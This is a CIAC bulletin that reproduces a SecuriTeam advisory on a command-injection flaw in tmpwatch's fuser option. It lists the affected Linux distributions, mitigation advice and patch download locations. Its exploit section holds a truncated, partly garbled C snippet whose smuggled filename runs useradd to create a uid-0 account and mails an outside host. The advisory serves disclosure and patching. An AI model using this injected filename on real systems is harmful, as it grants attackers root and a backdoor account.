|
PROBLEM: The tmpwatch utility has a flaw in the execution of the system() library subroutine. PLATFORM: Red Hat Linux 7.0 (tmpwatch v2.5.1) Red Hat Linux 6.2 (tmpwatch v2.2) Conectiva 4.0, 4.0es, 4.1, 4.2, 5.0, prg gráficos, ecommerce, 5.1 Trustix Secure Linux Mandrake 6.0, 6.1, 7.0, 7.1 Immunix OS 6.2 DAMAGE: Through the use of arbitrary commands to the system() library a local user account could gain root. By creating layers of subdirectories in a subdirectory monitored by tmpwatch, a local user could fill the system process table. This would cause a denial of service to the system requiring a hard reboot. SOLUTION: Apply the patches specified in the advisory.
VULNERABILITY The risk is MEDIUM. The advisory has been publicly discussed, ASSESSMENT: with exploit code given.
[****** Begin SecuriTeam Advisory ******] Insecure call of external programs in tmpwatch ------------------------------------------------------------------------ SUMMARY The tmpwatch utility is used in Red Hat Linux to remove temporary files. This utility has an option to call the "fuser" program, which verifies if a file is currently opened by a process. The fuser program is invoked within tmpwatch by calling the system() library subroutine. Insecure handling of the arguments to this subroutine could potentially allow an attacker to execute arbitrary commands. DETAILS Affected Versions: Red Hat Linux 7.0 (tmpwatch v2.5.1) Red Hat Linux 6.2 (tmpwatch v2.2) Conectiva 4.0, 4.0es, 4.1, 4.2, 5.0, prg gráficos, ecommerce, 5.1 Trustix Secure Linux Mandrake 6.0, 6.1, 7.0, 7.1 Immunix OS 6.2 Immune Versions: SuSE Impact: This vulnerability may allow local attackers to compromise superuser access if the administrator in a non-default manner uses tmpwatch. The tmpwatch tool removes files that have not been modified or accessed within a specified amount of time. It was designed to securely remove files by avoiding typical race condition vulnerabilities. System administrators usually run this tool periodically to remove old temporary files in world-writeable directories. The tmpwatch tool uses the --fuser or -s options to avoid removing a file that is in an open state in another process. This option uses the system() library subroutine to call the external program /sbin/fuser with the file name being examined as an argument. The system() subroutine spawns a shell to execute the command. An attacker may create a file name containing shell metacharacters, which could allow them to execute arbitrary commands if tmpwatch with the fuser option is used to remove the file. Source code comparison between the Red Hat Linux 6.2 and 7.0 tmpwatch packages suggests this vulnerability was recognized and a fix was attempted. However, the fix is incorrect, and the vulnerability is still exploitable. Exploit: 1. Compile and run: #includeint main() { FILE *f; char filename[100] = ";useradd -u 0 -g 0 haks0r;mail haks0r@somehost.com Recommendations: Do not use the --fuser or -s options with tmpwatch. Red Hat has issued the following RPMs that contain fixes for this vulnerability. Red Hat Linux 6.2: Alpha: ftp://updates.redhat.com/6.2/alpha/tmpwatch-2.6.2-1.6.2.alpha.rpm Sparc: ftp://updates.redhat.com/6.2/sparc/tmpwatch-2.6.2-1.6.2.sparc.rpm i386: ftp://updates.redhat.com/6.2/i386/tmpwatch-2.6.2-1.6.2.i386.rpm Sources: ftp://updates.redhat.com/6.2/SRPMS/tmpwatch-2.6.2-1.6.2.src.rpm Red Hat Linux 7.0: i386: ftp://updates.redhat.com/7.0/i386/tmpwatch-2.6.2-1.7.i386.rpm Sources: ftp://updates.redhat.com/7.0/SRPMS/tmpwatch-2.6.2-1.7.src.rpm Conectiva: ftp://atualizacoes.conectiva.com.br/4.0/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/4.0es/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/4.1/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/4.2/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/5.0/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/5.1/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/tmpwatch-2.6.2-1cl.src.rpm Trustix Secure Linux: This file can be found at: http://www.trustix.net/download/Trustix/updates/1.1/RPMS/ Or ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/ Mandrake: You can download the updates directly from: ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates Linux-Mandrake 6.0: 6.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm 6.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm Linux-Mandrake 6.1: 6.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm 6.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm Linux-Mandrake 7.0: 7.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm 7.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm Linux-Mandrake 7.1: 7.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm 7.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm Immunix OS 6.2: http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/tmpwatch-2.6.2-1.6.2_StackGuard.i386.rpm Or http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/tmpwatch-2.6.2-1.6.2_StackGuard.src.rpm ADDITIONAL INFORMATION The information has been provided by xforce@ISS.NET X-Force, grange@RT.MIPT.RU Alexander Y. Yurchenko, tsl@TRUSTIX.COM TSL Team, draht@SUSE.DE Roman Drahtmueller, security@LINUX-MANDRAKE.COM Linux Mandrake Security Team, and greg@WIREX.COM" Greg KH. [****** End SecuriTeam Advisory ******] ======================================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
Voice: +1 925-422-8193 (7 x 24) FAX: +1 925-423-8002 STU-III: +1 925-423-2604 E-mail: ciac@llnl.gov World Wide Web: http://www.ciac.org/ http://ciac.llnl.gov (same machine -- either one will work) Anonymous FTP: ftp.ciac.org ciac.llnl.gov (same machine -- either one will work)